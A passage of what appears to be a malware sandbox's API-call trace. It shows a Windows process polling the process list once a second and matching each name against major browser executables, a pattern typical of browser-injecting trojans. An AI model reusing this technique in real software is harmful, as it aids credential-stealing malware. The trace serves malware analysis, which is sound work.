cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0232.859] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0232.859] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0232.859] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0232.859] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0232.859] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.859] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0232.860] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0232.860] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0232.860] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0232.860] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0232.860] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.860] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.860] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0232.860] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0232.861] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0232.861] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0232.861] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.861] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.861] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.861] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.861] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.861] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.861] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.861] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0232.862] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0232.862] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0232.862] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0232.862] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0232.862] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.862] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.862] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.862] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.862] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.862] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0232.862] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.862] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0232.863] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0232.863] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0232.863] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0232.863] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0232.863] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.863] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.864] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.864] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.864] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.864] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0232.864] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.864] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0232.864] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0232.864] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0232.864] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0232.864] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0232.864] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.864] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.865] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0232.865] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0232.865] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0232.865] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0232.865] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.865] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.865] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.865] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.865] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.865] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0232.865] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.865] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.866] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.866] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.866] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.866] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0232.866] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.866] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.867] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0232.867] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.867] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0232.868] CloseHandle (hObject=0xe8) returned 1 [0232.868] Sleep (dwMilliseconds=0x3e8) [0233.868] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0233.870] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.870] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0233.870] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0233.870] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0233.870] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0233.871] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0233.871] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0233.871] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0233.871] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0233.871] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0233.871] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0233.871] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0233.871] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0233.872] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0233.872] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0233.872] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0233.872] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0233.872] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.872] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.872] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0233.872] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0233.872] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0233.872] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0233.872] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.872] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0233.873] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0233.873] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0233.873] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0233.873] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0233.873] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.873] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.873] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0233.873] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0233.873] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0233.874] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0233.874] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.874] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0233.874] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0233.874] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0233.874] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0233.874] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0233.874] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.874] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0233.875] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0233.875] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0233.875] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0233.875] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0233.875] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.875] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0233.875] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0233.875] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0233.875] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0233.875] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0233.875] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.875] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0233.876] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0233.876] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0233.876] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0233.876] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0233.876] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.876] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.876] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.876] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.877] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.877] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.877] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.877] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.877] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.877] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.877] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.877] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.877] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.877] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.878] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.878] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.878] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.879] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.879] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.879] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.879] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.879] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.879] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0233.879] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0233.880] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0233.880] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0233.880] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0233.880] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.880] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.880] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.880] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.880] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.880] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.880] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.880] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.881] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.881] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.881] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.881] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.881] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.881] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0233.881] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0233.881] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0233.881] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0233.881] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0233.881] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.881] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0233.882] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0233.882] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0233.882] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0233.882] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0233.882] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.882] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0233.882] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0233.883] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0233.883] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0233.883] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0233.883] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.883] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.883] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.883] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.883] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.883] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0233.883] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.883] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0233.884] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0233.884] lstrcmpiA 